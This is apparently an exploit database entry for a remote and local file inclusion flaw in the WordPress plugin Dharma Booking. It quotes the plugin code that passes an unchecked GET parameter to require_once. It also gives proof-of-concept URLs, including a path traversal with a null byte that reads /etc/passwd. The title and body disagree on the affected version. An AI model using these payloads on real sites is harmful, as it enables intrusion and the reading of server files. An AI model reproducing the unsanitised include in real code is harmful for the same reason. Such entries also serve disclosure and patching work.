WordPress Plugin Dharma Booking 2.38.3 - Remote File Inclusion

Author: AMAR^SHG
type: webapps
platform: php
port: 80.0
date_added: 2016-03-22 
date_updated: 2016-11-22 
verified: 0 
codes:  
tags: WordPress Plugin
aliases:  
screenshot_url:  
application_url: http://www.exploit-db.comdharma-booking.zip

# Exploit Title: Wordpress Dharma booking File Inclusion

# Date: 03/22/2016

# Exploit Author: AMAR^SHG

# Vendor Homepage:https://wordpress.org/plugins/dharma-booking/

<https://webcache.googleusercontent.com/search?q=cache:1BjMckAC9HkJ:https://wordpress.org/plugins/dharma-booking/+&cd=2&hl=fr&ct=clnk&gl=fr>Software
Link : https://wordpress.org/plugins/dharma-booking/

# Version: <=2.28.3

# Tested on: WINDOWS/WAMP


dharma-booking/frontend/ajax/gateways/proccess.php's code:
<?php
include_once('../../../../../../wp-config.php');
$settings = get_option('Dharma_Vars');
echo $settings['paymentAccount']. $settings['gatewayid'];
require_once($_GET['gateway'].'.php');
//
POC:
http://localhost/wp/dharma-booking/frontend/ajax/gateways/proccess.php?gateway=LFI/RFI
http://localhost/wp/dharma-booking/frontend/ajax/gateways/proccess.php?gateway=../../../../../../etc/passwd%00